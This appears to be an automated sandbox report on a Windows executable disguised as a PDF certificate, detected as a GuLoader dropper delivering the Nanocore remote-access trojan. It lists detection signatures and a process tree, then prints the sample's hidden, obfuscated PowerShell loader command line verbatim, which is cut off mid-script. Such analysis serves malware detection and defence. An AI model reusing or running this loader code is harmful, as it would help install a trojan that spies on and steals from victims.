Edit tour

Windows Analysis Report
Certificate#U00b7pdf.exe

Overview

General Information

Sample name:	Certificate#U00b7pdf.exe
Analysis ID:	1467968
MD5:	6db7bb3d97afa79630d4085427e93bdf
SHA1:	c3c7306af8b9b4fa9602dec9b128f895af169646
SHA256:	6f3d9c1d62a29f4a030a0d2bded9600599d301784f5f0b6edfc96fc3b2b404fb
Infos:

Detection

Nanocore, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected Nanocore Rat

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Sigma detected: NanoCore

Sigma detected: Scheduled temp file as task from temp location

Yara detected GuLoader

Yara detected Nanocore RAT

C2 URLs / IPs found in malware configuration

Found suspicious powershell code related to unpacking or dynamic code loading

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for sample

Opens the same file many times (likely Sandbox evasion)

Sigma detected: Potential PowerShell Command Line Obfuscation

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses dynamic DNS services

Uses schtasks.exe or at.exe to add and modify task schedules

Very long command line found

Writes to foreign memory regions

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Installs a raw input device (often for capturing keystrokes)

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64native

Certificate#U00b7pdf.exe (PID: 4180 cmdline: "C:\Users\user\Desktop\Certificate#U00b7pdf.exe" MD5: 6DB7BB3D97AFA79630D4085427E93BDF)

powershell.exe (PID: 5620 cmdline: powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens\Kommandosyntaksen.Knk' ; powershell.exe ''$cas'' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

powershell.exe (PID: 5828 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Fordaervet Kauch Ticklenburg Synonymized Nippers Hysse #>$Boarspear = """Pe;ReF SuSunSkc OtPri Po Cn D AeBCarTju Cd Kg coAsmSemDee M0Wa4 K B{St Do Tr U KopTeaFor oaatmNo(Ov[HaSPot Fr UiSlnSpgVo] H`$PiS Ca UlSteAns FwDio Om Fe Un p)Re; D De d A D`$ RT Fh viChoOpt Ch Wr Ti Ex T No= R SNNoeInwUd-OcOReb UjFoe ScGotOc MebMiyLdtPreIn[Fo] P Sc(Ib`$ CSSpa ll UeEns MwSeoGdm BeDynAn.InL De An BgJot Ch P Fo/Co A2Su) I; D Ma Sc F FlFFyoSlrMe(Sc`$ PA DnPitPai FlMuaTrbAso PrSks K=Pa0Ra;Bi B`$BaA Nn GtPoi LlspaRabHvo SrBls V Pr- Ml AtBo Fa`$PaSDia SlOpeBaslew So Sm Ze MnSl.LyLVaeDrn Yg Ft Dh T;Il Lf`$ PA pnHyt Ci NlEkaTabFioStrSks C+ I=Li2An)Af{Ku D Sk E St Ku Pe Fo Fa`$ekT BhSei SogutBehinr uiVaxUn[Ta`$BiAYondat SiRelIma AbGuo Nr Ws t/ T2 P] F No= O Pa[uncGloInn BvPye SrUntSe]Im: U:CaTTho PBSyyantAueUn(Fj`$ SS Ia Tl SeMes Fw Bo bmfoeBonSu.KlS au Kb Ss MtLor TiSpnAng Z(St`$PhAUnnsatBui HlFoaMybMioSorTus D, I Er2un) G,In au1Mu6Ca)Mi;En Re Ti`$ReT Fh SiRooFit Sh PrSoi DxSv[ar`$GaACinTrtEdi Slbra NbIno Or AsTa/Tr2Sk]Br P=Ud Un(Su`$SaTIthEfiBao Ct BhAlrFli Txga[Pa`$SnAWinBrt CiUnlKraOdbMeo ArHlsMi/Sp2Vi]Br L-FobVaxSpoDerCa K1 S1Fo8Mb) f;Sy P L Y Ty}Re Ki[ DSEnt Sr FiAnnStgSl]St[SaS KyGis Lt Ue fmPa. STPle pxgotAb. SEBrnSuc Ko rdAfiunn Pg b] K: S: RA IS SCSlI LINo.TeG de BtAmSditPur Zi PnHag T(Ca`$DaTGrhCiiscoUntRuhRorUsiSax M)As;Dd} s`$ViS PkOarfim Ga Ar mbMae SjAmd Re OsEp0 O=InBDerBauVid SgNooInmHymSkeDa0Ar4 I Bo' D2Ek5Nu0StFFa0Hu5 S0Un2Dj1 U3De1 tB K5Cl8 T1Ma2 I1 NAAn1BiAPe' S;Pr`$ KSUdkLarMum JaudrAfb ReKlj AdAkeBrsSt1fo=GoBBrr PuTrdPegProLam Pmame P0Gu4 R Uf' R3MiBbl1YnFAs1 R5Ec0My4 M1 S9Ro0De5 S1Bj9 N1 H0Ga0 U2 M5Ra8No2 A1De1 SFTo1 I8 R4Op5 R4Pa4Ni5 S8 J2 O3St1Ko8 S0Be5in1In7ud1Ov0Fo1 b3 S3Un8Bi1 L7 L0 K2Fl1 MF E0Ma0Ov1Qu3Ge3 bBEr1De3cl0Fi2 K1 OESc1 B9 L1 A2 M0 B5Ko'Ou; F`$SlS skHkrStm CaAnr UbExe AjKodTre AsSk2Ge= FBGar suScdImgSkoKam sm DePr0Co4Br Sa' A3 S1Ko1Sj3Ja0 S2Un2 L6Sc0Bu4 M1Be9 I1 G5 D3Sp7 S1Dy2Wi1 S2 G0 E4 P1In3 A0 V5Bt0Bu5In'mo;sm`$PrSSik IrGrmafa ArUnbSte SjModPieVas H3Av=PjB Mr Bu udOlg woWim Mm Me U0ha4 S De' F2 v5Sw0obFAs0fo5 B0 S2Ma1 S3 S1 FBMo5Do8Ge2V 4Us0 A3 s1 M8Xa0Sl2Fl1VeF S1DeB Q1 U3ma5 a8Re3AnFWi1 G8 T0 D2Sy1po3Ny0 D4Bo1 E9 S0Fo6 P2Av5 L1Re3Un0sn4Ag0Co0ba1 FF T1 P5 o1Ke3 C0Bo5 O5Un8No3 sE P1Re7 T1nu8Vr1Gr2 R1MiA S1Ra3Ge2Un4 U1Ov3 C1Ud0Hd'Ro;Ru`$JoS UkAfr Sm IaSerMob IeFljUddWieFes G4 K= IB KrdruTidDegNoo cmbim keWa0 P4Ru Se'Te0Di5Re0Un2Pr0Co4 R1BrFSp1se8 G1Fl1Pu'Il;Se`$KeSFukUfrThm Na LrVib Se Fj UdPaeBasAn5un=StBDyr Au TdSjg PoKumLdm te L0Im4Lo Ne'Gy3Pe1Bl1 D3Hy0Br2Ko3LiBPa1be9Ma1Vi2Tr0su3Se1 PA T1 M3Mo3HaESu1No7Gr1 R8 T1Ke2St1 SA U1St3 V'Ji;Tr`$beSTakMir HmDoa FrSvbVieOljlad CeTrsAf6 D=PeB CrMau RdRegMio Wm bmBoe U0Bl4 F my' V2Rn4Ge2Ge2 G2cl5 A0On6 F1Ti3Ap1Hj5sj1AtFSk1 F7 T1 MA s3 C8 M1 N7Ok1 TB E1Fo3 B5PrAUt5Eu6Dv3 VE s1 IF E1Bo2Hy1 V3 A3 E4 B0RoFRe2Fa5 O1 AFAl1Fa1Te5boA I5Be6 H2 R6 B0Su3Sm1 G4Fu1 KAOb1AnF H1tr5Hy' G;bo`$CoSDekLurSum AaStrCob eePrjbid Ee RsUn7Ju= sBoxr NuEndWigMaoFomIgm TeHy0Mo4St We'Fi2Fo4me0Uf3Lu1No8Sc0Hv2 B1RaFFo1KaBGr1Al3 P5SaA R5Bo6 E3 FB I1 K7Ko1Im8An1 B7Am1 C1Cu1 B3 S1sp2 P' V;Fo`$IrSTwk Mr Lm Va SrsmbPle Pjlid Ne ts R8 B= TB Ir NuindKngInoPumMomRee R0 J4 e Sy'Ug2Aa4 U1 H3By1Ti0 h1 BA y1Pa3 S1Tr5br0 A2 L1Bu3de1 S2Ni3 K2 A1Fi3Kr1AfA C1Vi3Em1Pr1Pr1 M7Re0Et2 H1Bo3 S'br; C`$PrS FkHor MmSea UrRabFeeNojDyd MeFrsMa9 A=FeB Ur Ru OdHogKroWhmCrmOsewe0An4Ra W' D3ReF G1Be8 G3UnB N1 N3Th1 VB U1 V9Kl0Sc4Ef0HmFSy3 ABBe1Sp9Se1St2Ma0Il3 C1ChAUn1Bo3 H' P; M`$ TrEuoGus XiMenBreFor CsAc0 S=FuB BrPeuOvd Jg Io SmDamPreCo0Pa4 S G'Ar3MiBst0 TF R3Ta2Ub1Fy3To1AbAPr1 K3 K1Ki1 P1Sk7Ab0Re2 P1Hn3Co2 P2 A0AlFDv0Un6Ga1 E3Ej'Li;Mi`$Chr IoAls CiDen MeCarPasBr1 S=BaB Sr CuFadCag SoDemMamCoeUn0 M4 D Ov' N3Ca5 L1NsAKo1sk7 F0Ch5Et0 D5 P5CaACl5In6Pr2 V6Sp0Ko3Su1 S4 S1ReA P1DaF P1 P5Sk5TrANi5 F6 S2Su5Bo1Si3 I1Gr7Qu1SvAGr1 U3Gw1Re2Be5UdA F5 N6bj3 u7 j1Ja8un0 D5un1 AF T3 U5 U1 fA S1 N7Ta0Ov5St0Nr5Un5 TA C5Va6 A3co7Gr0So3 R0Bu2 E1 S9In3Ko5Ov1CaATe1 A7Bi0 D5 N0Vg5In' N;Pi`$BerbroUnsUni Sn OeBirKosOr2Ko= DBGurSpuUnd LgOvoMumTemKoe S0Fe4Fr Uv' P3ReFPr1At8Sa0Su0 D1 B9Th1 aDUd1Ar3An' F;Ri`$ForStoBasUii cn Uensr SsHo3su=CoBEnr wuHyd OgPio UmSvmCheMy0 L4tr K'Te2 S6st0 P3 G1Ve4Op1OvAIn1SpF I1Fo5Be5FrABe5 U6 D3GoE C1AkFBr1Li2Ge1Gr3 U3 K4Ho0 UFLy2 N5Si1UnFDi1Il1 T5BaA A5 m6In3Sl8Su1An3 U0Kl1Re2 N5Ov1RuACh1pa9 E0 D2Ob5PoARe5 E6fr2Re0Sk1 jFNo0Sc4 c0Ga2 S0 B3 U1Sa7Sk1 NA j'Ge; r`$PerSioDrs PiFenExe ir AsFu4Bo=NaBTrrNau CdTogMuoScm MmRae V0Or4 F S'Gi3Br5 N0Ma4 P1Ne3 c1ro7 P0 Q2El1Sk3 S3Pr0La1 MF E1DeAEn1Sk3 T3BeB T1Dr7 A0io6Po0Do6Zy1 MFGo1Ud8 R1Ma1St3Jo7 E'No; E`$AurRooAfsIniSwnVaeKlrInsDe6 m= RBDirFeuLad UgMooSem AmRee L0 O4Tr Pr' N3PhB B1 T7Ge0 W6 G2 O0 s1 nFso1An3 P0 g1Hu3Bu9Te1Tr0Ov3Mo0Mi1siF N1 PA F1 N3 P'Re;Af`$BlrAdoFosImiSln SeThrBrsDo7As=SyBShr Uu DdPrgSvo Fm TmUneFa0Ki4 L Eg' D3BiFRe3 S3Va2PrEma' E;Pr`$Kar HoMosBui PnBleGrrBssDe8 R=KmBBarAuuDedFrg Ko EmUtm Se L0Ed4Ko Gi'Ov2BoA t'Lu;Bi`$ UH So Fl UaVebBri Br Sd U1 R2 K0No= DBCar BuLadSagadoAnm Fmele A0 M4by Kl'Up3 P3Br1Op8Sy0ti3rd1ReBsy2Ad4 T1bo3Fo0Si5Ex1 u9 I0 C3St0Ad4Fr1To5th1ot3Pa2Bu2 S0BiFLt0ca6 h1Fo3on0Sp5Be2Ra1 T'Eu;Ty`$PaC So Sm BpSplUneComAleEnnLytBei Nn wg U F=Sn FlBMerEku KdFagUdo KmFemdeeHy0Fu4 V ca'Re1CaDGe1be3Es0Ob4Cy1Sh8 I1 A3Ah1VeA O4De5 A4Op4Th'Le; Uf SuSun pcLit TiTeo Dn K HfSpkFip C Un{ FPPoa Ar SaBem O e(Ma`$ CsAhi nk Ss pa AkDal UiSin FjUneSkrMa, I Mi`$PaNMio ln Ma RbUnsHyoPilTyu St PeDinLaeResNes S)Se S P U W So;Je&Cr(Re`$ Lr ToNas kiPan Se LrCosFi7 F)Op Bi(BoBinrdeuBod sg Uo OmpamOreTi0 S4 F Br'tr5Ru2 S3 SFKa1 H8Di1Mo2Fo1 t0 A0Ta4 U0 D5 d1Do3Mi1 CAAf0Ko5 S0 T2 k1De9 S1 CASa1To2 U0Bl5Im5At6 p4 oBol5Pu6Lo5 FE m2UnDRe3Mo7Ep0ka6 R0 f6Ge3Ma2Un1In9Bu1HoB S1 F7 M1 UF S1 A8Sp2ThBPa4 GCRo4PaCTr3Fi5 F0Bu3Fo0Ji4Cu0 U4po1 O3Au1Lo8Hu0 E2 O3Un2 S1Un9Ac1PaBIn1Pi7pi1SaF T1Te8Ce5Fu8 S3 F1 W1me3Pe0 A2Dk3 D7 T0Ke5Cl0Me5Ge1Fn3Gr1OvBAf1Le4 N1 TASc1UdF Y1Ov3Pa0Sy5in5SpE V5 SFAy5Sc6Sp0GoA J5Be6 F2 S1Bl1 GEHi1Fu3 A0 A4Al1 I3 U5MaBKa3 G9Sk1 D4Fl1UdC S1 G3Br1 G5Fo0 P2Ha5Oa6 B0 RDDi5 B6Pa5Op2Sk2Fo9Gi5Ph8 b3 e1 V1ToA C1Ov9bo1He4Gl1 S7 N1 AA P3 A7Fl0 D5Ly0 R5Sl1 O3 S1SnBWi1 P4Or1FeA m0moFFr3 S5Fo1 S7Th1Pu5 U1 BESu1Un3 G5Eq6Gl5 TBPy3Mi7 D1Re8Pa1 A2Ug5Wi6 G5Vi2Cr2 P9Lu5 S8Bj3KiA S1sc9 o1Pu5Fo1Pa7Ar0 U2hu1TeFMo1 A9an1 A8Be5Wo8ho2su5Kl0Ge6Ap1deAIn1AkF M0Sc2vi5IrEBa5 U2Br0st4Ex1Te9 A0Ud5 A1 LFRb1Se8Fa1Bu3Di0 T4 N0Ke5ga4GuE H5 KFIn2LaDHj5SpBHa4 S7 L2 tBRe5We8Yn3la3 A0 J7ga0Ho3 I1Su7ev1 LATr0 H5 G5TaElt5 S2 S2Ef5Ga1QuD D0Ad4No1 BBJo1So7 S0 C4vi1 P4 H1He3Pr1 GCTo1 A2 F1Op3 V0Rg5Ul4Hu6 P5 BFPr5 d6Ho0EkBBe5KaFMa5 u8 W3 T1Ro1 T3Sy0Do2 S2 T2 T0 IFKl0 K6Ma1 M3Pe5FrEUn5 G2Fr2Op5 B1meD t0Su4Mn1 FB D1 P7 R0 S4 S1Ca4Fo1Re3Sp1 EC G1Li2 E1Sk3La0Sp5Ta4 H7Re5teFPl'Sp)Em;Sp& D( I`$Afr Oo Us aiMun he Kr Ts B7Fl)Ku Am( TB OrSuu LdStg AoSym FmReeUd0Un4li Ca' H5 A2 S3Sk8La1 t9 B1 L8Ur0Ud5 B0Pi2Re0 DFBa1MaAOv1DsF S0LeCKn1 R3he1Ko2 D5Ko6 S4ReB T5 s6 R5En2St3 GFBr1 h8Af1Ti2Sk1 S0Be0Fo4 S0Pl5Ha1 I3Wa1 MA P0 O5 S0Lu2 G1 I9 S1 GA C1Su2Ha0 P5Un5Pl8 P3 A1 S1 T3ve0 S2Wi3 SBFi1 H3En0 A2Sy1 DEBe1Su9 I1 K2 M5 VEBl5Di2Gr2Ph5Ob1 RD I0 P4 S1ReBEn1gu7Af0 S4pr1Bl4 W1Sk3Pl1DeC S1 F2Hv1 F3Va0 S5Ma4vr4 C5 CAFo5Cl6 N2brDIm2Po2Gr0 PFBr0 D6 e1Fa3 S2DeDSn2SkB U2GlBCa5 D6Sy3Im6Im5 SEUn5In2Fi2 C5 T1BiD B0Co4Fo1OcBHa1 D7 P0 S4 M1Bi4Ek1Pe3 C1 NCAn1Ne2Se1de3 A0 E5An4Li5Fr5 DAko5 D6Tu5re2 B2Te5 D1PiD u0 P4 N1OsBAd1Ka7 w0 H4 F1 E4Un1 M3 C1 ECPr1Be2 u1Li3Ba0hy5Rg4 J2 A5TeFLe5 RF R' B) S;el& C( P`$Blr Fo SsSti An Kestr SsSt7Ac) A Ca( OB GrDduApd eg SoGumAnm Ae B0Be4 L Kr' A0 L4 B1 M3Sl0Dr2Sm0Sy3Pr0Un4 P1Ru8Br5Pe6 C5 O2Pr3Di8 E1Ko9ca1Mi8Ap0 F5Ba0 T2El0ApFBa1 sAhe1EiFVi0 SC B1Pr3Re1Di2Be5Ud8Sa3 DF P1Ga8 M0Re0Ny1In9 I1 GDOv1Hy3pe5MiEBa5St2Po1Ta8Di0 T3Un1 FAew1InA A5 RA g5 Y6In3 I6Tr5RoEDa2 FDDi2Es5Sl0stFRo0 i5 S0Ta2 a1Re3Sk1WaBMa5Ma8 V2Fl4Pa0 S3Lt1 S8 F0An2St1RiF A1PoB T1Va3Ri5Ce8Am3veFRe1sk8Ki0Af2Sn1Ho3Bo0 B4 R1Bo9Gi0 C6Fs2Br5El1Mr3 K0In4Wa0Te0Ag1PoF S1 S5Ma1 C3Fi0Sp5 G5Be8 Y3 LEKi1Sk7In1Pl8Ha1bl2so1 DAOc1Un3 E2 L4St1Ex3So1 D0Ac2MiBMa5SuEUn3In8 t1 A3Fo0Ja1un5DeB T3Lo9Fe1Ce4Pa1WaCBu1 E3Me1Us5Do0Ep2 S5 B6 G2We5 B0miFPa0Ns5ci0Ha2Sp1Fo3 H1KoBri5Wy8Pa2 F4 U0Om3In1Pa8Al0Ph2 T1GeFUn1caB P1Ac3 T5 G8 D3 kFEn1Bi8Ou0Bl2Un1Pa3 B0 L4Ac1 D9 T0Si6Cu2Ca5Un1Tr3re0Pf4 O0Fo0Af1 SF D1 D5De1Gr3 F0Le5Me5 S8gr3 GEvi1 R7In1Co8 E1So2 A1OuA U1Co3 I2 F4 U1Ga3Mi1 L0Tw5 IE E5RuE n3Ek8 T1Na3 N0St1 M5BuB I3Pr9 F1 S4 S1AbCSu1 R3Ch1 H5Pr0Al2Th5 B6Hj3SlFTo1 F8Ch0ho2Ro2Ko6Bu0 D2Pr0Ma4Hj5 sFFl5HiAMo5Ul6al5unE A5Pe2 H3GlFBo1Te8 s1 S2 r1Qu0Re0 B4Sr0Cy5Jv1be3 F1BlAGo0Un5 C0Ag2Wi1 H9fo1UnAKu1In2 O0 A5 O5In8Ka3Em1 S1yl3Sa0 r2Ma3ThBLi1Ba3 A0St2 N1TiELi1 M9De1Fo2 F5MaESt5 T2 N2Wo5Ph1 RD R0Pr4Ko1 RBKo1Ad7St0Hm4Mi1 B4 F1Re3 A1 SC c1 T2 S1 O3To0Br5Sl4 a3 O5 OFDi5 LF R5Sk8 R3AuFRe1 B8 J0 B0Al1Tu9Ki1IaD C1 R3Bo5BrENo5 C2 F1br8 b0Sa3Ba1FlATr1GnAma5FaA B5Un6 R3Ho6Ap5ReE S5Ch2 F0He5Bl1SkFRe1CiD I0Di5 t1Ma7Ce1KoDda1 NAfa1PeFSp1 S8Ap1FoCUd1 T3Fr0Gr4Vl5SnF U5 SFAu5 MF s5LlFEt5PaA V5Co6 K5Sh2Fu3un8 T1 L9Un1Gr8 M1 G7Sp1Al4Gr0 I5 S1 I9 U1 CATi0Co3pr0Ph2Fo1 M3 U1 U8Co1 D3Tr0 I5 O0Rh5Un5 BFDi5ToF P'Se) C; I} SfAfuemnSec StPoi GoRonSk FoG PDLaT F Da{ vPHoaVerBiaSkm O T( A[FlPPaa urAraKam SeRet ReSerRe(UnPUno Ss DiCot HiJeo Unhe te=Ar En0Tr, N SM KaSan IdSaaPot AoBor FyCh e=Aa Pu`$brT PrUmuDieKl)ei] S Au[PaT SyTop LePr[Di]Ch] e M`$saPTae CsMat UiInlKveCinKosGaeFon CsKa, R[ SP Ha Or Ma tm reHetHoe Artr( CPSloBlsSyiBet Ui SoPunGl P=Ca K1Fl)Ma]Te R[StT My Dp Ke M] S Id`$ SG Ar OaAdnTadfap TaForSceHen stTiaBrlUn1An6Si4 B Cu= A ro[ FVNoo Si NdDi]Ti)Ap;Kr& A( s`$RirNyo SsGaiSpnFre Or Js P7Rg)Fl S( AB NrSguAld LgTaoEnm cmMhe f0Af4 P K' S5 K2Sa3SnESe1 A9 D1 TB S1 T9 T0Ky2Co1 PE B1Hr3On0Qu4Mi1 sBTa1Co9 A0 B3Wi0Gl5 B5Ba6 J4TrBRe5ti6Fr2ReD F3Be7 P0 z6gr0Er6Br3Un2De1Qu9El1MiBMa1Co7Gi1WoFVi1Hi8 P2GrBCo4LoC A4InCNo3 I5 m0 B3 I0 E4 K0As4 D1Ps3 K1Su8Oo0 C2Ti3 W2 R1 y9 R1seBFr1St7 G1 rFCa1Fa8Ch5So8 W3 E2bo1Ac3 C1 T0 G1 AFUn1Cl8 M1 O3Rd3co2de0BaFTi1 G8Ur1Be7 S1 OBMa1opF V1fi5 S3 M7Re0 g5Pa0Ef5Su1He3 T1 PBFi1 H4Yo1 MANe0HiFSp5 EEDe5LeEAf3in8Ug1 T3Ga0 G1 M5SeB S3Ce9 J1In4Pr1inCca1Li3 D1Sp5Et0Tr2Ti5 O6Pe2 M5Mu0 nFDu0Lf5 N0Yo2Th1 S3Ne1VaBof5 d8Mo2In4Re1 J3Ga1 L0Fl1PlAZe1ha3Sg1 D5Ud0De2Gr1 SFVe1Ce9Br1 O8 O5Re8Gi3 A7Su0 S5Ly0 U5Su1Ud3Nu1 TB E1Re4Al1PaA U0UnF S3 C8Eu1 I7 C1 KB U1Op3mi5 gEHa5 S2 J2 S5 I1EtDSc0 G4Sp1 CB N1 N7ad0Se4 R1Te4Si1Ap3 D1VrC M1Un2 D1 B3 A0 U5Du4 REMe5VaFPo5 GF I5PrAPr5Mi6Te2MoDCs2Sn5Fe0BrFLu0 P5Ac0Fl2 B1Ti3 D1 OBLi5 U8Tr2To4Fl1Me3Un1Bg0 L1TyASp1 B3Cy1Ri5Ov0 F2Ca1RhFTh1Bl9Dj1Ub8Fr5 S8Wa3 I3St1PeB M1DiFEx0Tu2Pr5Ra8Ko3Se7Pl0Va5Mu0Vi5 I1St3yn1ReBTo1 U4 C1NoA B0HuFPl3 B4Kl0Ly3 K1 GFLa1NoAKa1 V2 L1Re3Al0Co4Ta3Ma7 E1Ba5 V1St5 s1 R3 M0Ba5Ma0 C5 U2BiBOv4GlC R4 fCEr2 S4 C0Be3Hs1 F8Tu5 BFUn5de8Un3Bu2Si1 P3Ba1 G0Sv1DeF O1 K8 S1 L3 G3 i2 C0 SFSi1 O8be1Fo7 m1 FB T1 FFUn1 L5 a3WeBAb1Dr9 b1Be2 E0 B3Sp1GiAVi1Un3 V5DeE U5Pe2Sa2 P5It1BaD J0 T4 B1 ABRe1ma7 r0 H4 M1Et4su1 F3Af1PaCbo1Co2 P1Ar3 b0pa5Eg4 MFBi5ErA S5 T6Re5Li2 V1Un0 N1Sk7 A1UnA t0Le5Go1 S3Ir5 AF R5 K8Sa3 P2Po1 T3 E1 B0da1BeF I1Al8 G1Ka3 S2 B2Ru0ReF K0Ba6 A1Se3 T5StE G5 R2Di0Un4Sy1Po9Mi0Tr5Sp1TyFTi1Ba8 S1 M3Mi0 S4Fa0 S5Ko4 M6Va5FoA d5 a6Bl5gr2 D0 B4 W1Fe9 F0 C5Va1TrFOm1Eu8Re1Mc3 s0Po4Lu0Gl5Af4St7Ud5OuA F5 G6 e2TaDEn2 H5 m0DyFUd0Bu5Hi0Se2 B1 K3 B1GuB U5St8Ha3BaB K0un3 B1 AA i0Fo2In1DaFBe1 O5 S1Na7he0Fi5Re0 S2Di3it2Af1Ou3 O1SpA V1kl3Po1De1In1He7An0Kr2 s1Bd3Op2PaBFa5InFBi' P) S;Be& S( S`$ Trfjo OsTriSen HeMor AsSk7 b) O F(ElB RrPludedSegBroEkm BmCee F0Sa4 E Un'Dr5 F2Ge3 FE N1 S9Ti1FeBLs1 D9 S0 L2Ov1 OEAf1 V3 s0 P4Ve1 CBMo1An9 B0 e3 A0 M5rr5 O8 O3 C2 R1 P3 B1im0Kl1AbFFi1 P8Kv1 C3 M3Ko5Sp1 l9Ef1 B8Al0Hy5 H0 P2 M0As4St0 P3 W1Ja5 S0Di2No1 A9Ge0Tr4 K5 aESt5An2Ho2Se5Ov1 SDSt0 T4 T1StB K1 c7 B0Pe4 T1 E4St1Ju3Me1 PCFo1Wi2In1Ri3Ta0Fi5Se4 S0 s5 dAMo5Ic6Vg2PrDBi2 S5Sc0 SFOv0Po5Ma0Br2Sk1 T3 R1 ABAn5 H8 B2 S4 E1 A3Un1 T0hy1TaADa1 M3 S1 S5Si0 D2Kl1BaF N1 T9 S1Ch8 M5Pr8Om3 I5 s1 K7 H1 SA T1KuAPr1ReF C1Ja8el1Le1 F3Cu5Sk1Il9 F1Af8 S0Su0 R1 U3ou1Sy8Ma0Fe2 F1KlFVe1Ph9Ad1 I8 S0 D5 U2 IBFo4WiCBa4 mC a2Su5 h0Gy2 N1Sk7Cl1Bo8sk1Re2 S1po7 U0 F4 S1La2Ge5unA S5 S6 U5Sk2Or2tk6 B1Sp3Ru0In5 U0Re2Ba1 IFAk1ObATr1Fl3Cy1 B8Ge0Bo5Ri1Un3el1Re8Si0 K5 S5 DFSk5 M8Sa2In5 A1Ka3 U0 b2En3AfFHu1GlB M0Re6bo1 FASp1 U3Ri1wrB K1 U3Ud1Ph8Kl0Un2Jo1Fl7Pl0 S2Fl1DrFTa1 D9te1 R8 R3Fo0Em1GuA E1Dr7 O1In1Ve0 I5 c5WaEwe5 H2 P2 B5 F1NoDJa0 G4 b1HuB S1 T7Pa0 D4 S1Mi4Ka1 T3 A1 HCSt1 H2Ch1Pl3 c0 C5Va4Ko1Re5 SFLa' A)Sk; E& A( A`$LarDmoLesKoiVen Se Sr Ss d7Be)Gr Bd(BrBLar Bu FdMigchoUnmMemTaeSk0 R4 P Un'El5Pr2Jo3 PESi1Ec9Ek1ImBEv1 T9 M0Bo2 A1DoE F1 T3Ju0Th4Ra1 UB P1Sa9Sl0Tr3Ep0 B5Dr5 b8 S3Sa2 N1fu3 S1In0By1 OFId1 G8 O1Fo3Sa3ChB B1No3Rv0Fi2Ly1 KEba1 B9 T1 A2 P5 GESt5Tr2Fa0Bi4Di1Re9 S0Pe5 u1HlFTu1 I8Ud1Su3Ta0 P4Sh0 T5Ch4Rd4 B5 FACu5Pe6Sl5Fi2 T0 P4 R1Hv9 F0Fo5re1 SFMo1Al8Of1 I3 C0Vi4 A0 N5Pa4Id5 M5 sA A5 V6Go5 F2 L3 E1Ve0 B4re1 a7 U1 K8Sk1Un2 B0As6Lo1 P7Br0Mr4Je1Po3Po1Fi8Ph0Pu2Ko1 S7 E1 BA F4Ko7 L4 C0Br4Ce2 A5amA G5 D6 l5Fl2Ua2 A6 E1Mu3 U0In5 B0Da2Re1LaFDo1ArAEk1id3 C1 S8 D0 A5Be1An3 S1Ve8 N0 S5 u5PeFPe5Ti8 P2 P5Sc1 A3Un0 S2Fo3 IFVa1niB P0 F6Ru1 IA M1Co3Sp1ToB L1 H3Ry1La8Gy0 M2Ud1Sa7Ec0Ba2Pi1 SFRa1 C9in1 O8Ba3Ga0He1WaAbe1Co7Ka1 A1Re0Ca5 V5DuETr5 E2Mi2 P5 A1SaDDe0Af4Hy1OvB G1Co7Ef0 F4 r1 S4 E1 M3 P1PeCSt1Sp2 S1Sy3Un0ek5en4 H1Sn5FaFLa'Be)Wi;Vu& A( G`$Kor ToCos CiWenReeSer VsSa7 W)Sn Py(MoBFrrAfuBod FgTioEnmFamDeeFo0Gl4 H Li'An0Th4Do1Tr3Fa0no2Fa0 a3 S0 K4vi1 T8Ti5 B6 A5 B2Se3TaEGi1La9Mu1FiB G1 F9 E0Pi2fe1 EE D1 S3 M0 V4 e1SuB U1 H9 B0 U3Re0An5Kn5 A8Ge3Vo5Be0Bl4 B1st3 H1 P7ad0 D2 C1Ag3fr2Ls2 T0MuFGa0Su6Un1Bu3 S5 VELo5MoFPo'Un)Py;St}Ud&Es(An`$ FrKao MsFli TnNoe NrOvs P7 C)In U(MeB ArEnuIndAfgTeoPemIsmAfeSa0pl4 B C'Gl5 F2 P3Ta2Un1 HF S1 D7br0Ga4 E0InFSu5 M6 E4SeBSt5fi6Fo2FlD B2Ma5La0SyFHo0Ne5 L0Dr2Se1Cu3La1AnBPr5 H8 D2 P4De0 R3 L1Ko8 V0tr2 O1PrF S1 RBSt1Un3An5 A8 A3TiF P1He8Ca0 L2 S1sm3Am0Ca4 M1St9Bo0Ti6 N2 B5Pe1 K3In0 P4Fr0 U0Ma1 IFSl1Ae5Kh1Sk3pi0su5Ti5 V8De3abBTr1 R7 I0 S4Mo0Be5Sy1FuEOp1 J7Bi1SlASm2BaB N4siCGa4 sC R3Pe1Be1 L3Hi0Ov2 O3 A2Af1Pi3 C1LoA R1No3 b1Re1Sl1Pr7Mi0 B2Ti1ta3Co3Da0Nu1Sc9 D0Bl4Bu3 I0 A0Le3 M1Re8On1Di5Fo0 B2pa1 VFmy1 r9 b1Ps8 O2 P6 S1 T9Or1VaFEn1 R8 Z0Bl2 T1 G3 p0 S4 V5QuE U5FoEFy1Ga0Un1 rDpl0 F6Ha5 P6 d5Pe2re3 G5Ta1 D9 F1 SBPr0Co6ra1ExA 